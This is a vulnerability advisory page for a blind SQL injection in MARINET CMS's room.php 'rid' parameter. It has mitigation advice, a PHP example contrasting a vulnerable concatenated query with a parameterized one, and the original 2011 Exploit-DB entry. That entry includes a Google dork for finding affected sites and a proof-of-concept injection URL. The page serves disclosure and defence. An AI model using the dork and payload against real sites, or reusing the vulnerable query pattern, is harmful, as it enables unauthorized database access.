Vendor: MARINET CMS
By: BHG Security Center
CVSS: 5.5 (MEDIUM)
CWE: Blind SQL Injection
Product Name: MARINET CMS
Affected Version From: All versions
Affected Version To: Final version
Patch Exists: NO
Platforms Tested: Linux
2011

MARINET CMS (room.php) <= Blind SQL Vulnerability

The MARINET CMS room.php script is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by manipulating the 'rid' parameter in the URL to inject SQL statements, potentially gaining unauthorized access to the database.

Mitigation:

Upgrade to a patched version of MARINET CMS that addresses this vulnerability, if one becomes available (this entry lists no patch). Otherwise, validate the 'rid' parameter and use parameterized queries in room.php to prevent SQL injection.
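
The mitigation above as an added example, not MARINET CMS code: room.php's source is not on the page, so the table, column and function names and the in-memory SQLite database are assumptions. It contrasts a concatenated query with an integer-validated, parameterized one, using the rid value shown in the advisory.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the CMS database (table and column names are assumptions).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE rooms (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO rooms (id, name) VALUES (1, 'Sea view double')");

// "Before": rid is concatenated into the SQL text, so the database parses it as SQL.
function find_room_vulnerable(PDO $pdo, string $rid): ?string
{
    $row = $pdo->query("SELECT name FROM rooms WHERE id = $rid")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['name'];
}

// "After": rid must be a positive integer and is bound as a typed parameter.
function find_room_hardened(PDO $pdo, string $rid): ?string
{
    $id = filter_var($rid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('rid must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT name FROM rooms WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['name'];
}

// '1 and 1=0--' is the URL-decoded form of the rid value shown in the advisory.
foreach (['1', '1 and 1=0--'] as $rid) {
    // Vulnerable path: the appended condition is evaluated and changes the result.
    printf("rid=%-12s vulnerable: %s\n", $rid, var_export(find_room_vulnerable($pdo, $rid), true));
    try {
        printf("rid=%-12s hardened:   %s\n", $rid, var_export(find_room_hardened($pdo, $rid), true));
    } catch (InvalidArgumentException $e) {
        // Hardened path: anything that is not a plain integer never reaches the database.
        printf("rid=%-12s hardened:   rejected (%s)\n", $rid, $e->getMessage());
    }
}
```

In the vulnerable function the page response differs depending on the injected condition, which is what makes the injection "blind" but still usable; the hardened function gives the same rejection for any non-integer rid.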

Exploit-DB raw data:

====================================================
MARINET CMS (room.php) <= Blind SQL Vulnerability
====================================================
 
 
# Exploit Title: MARINET CMS (room.php) <= Blind SQL Vulnerability
# Date: 30 - 09 - 2011
# Author: BHG Security Center
# Software Link: http://www.marinet.gr/
# Contact : http://black-hg.org
# Version: Final
# Google dork: inurl:room.php?rid=1 "POWERED BY MARINET"
# Tested on: Linux
 
[*] ## ExPLo!T:
 
 
http://localhost/room.php?rid=[SQL]

http://localhost/room.php?rid=1+and+1=0--

=================================**BHG Security Center**==================================|
# Greets To :                                                                             |
  Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ cmaxx  |
  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , Immortal Boy ~ farbodmahini ~ xb0y |
==========================================================================================|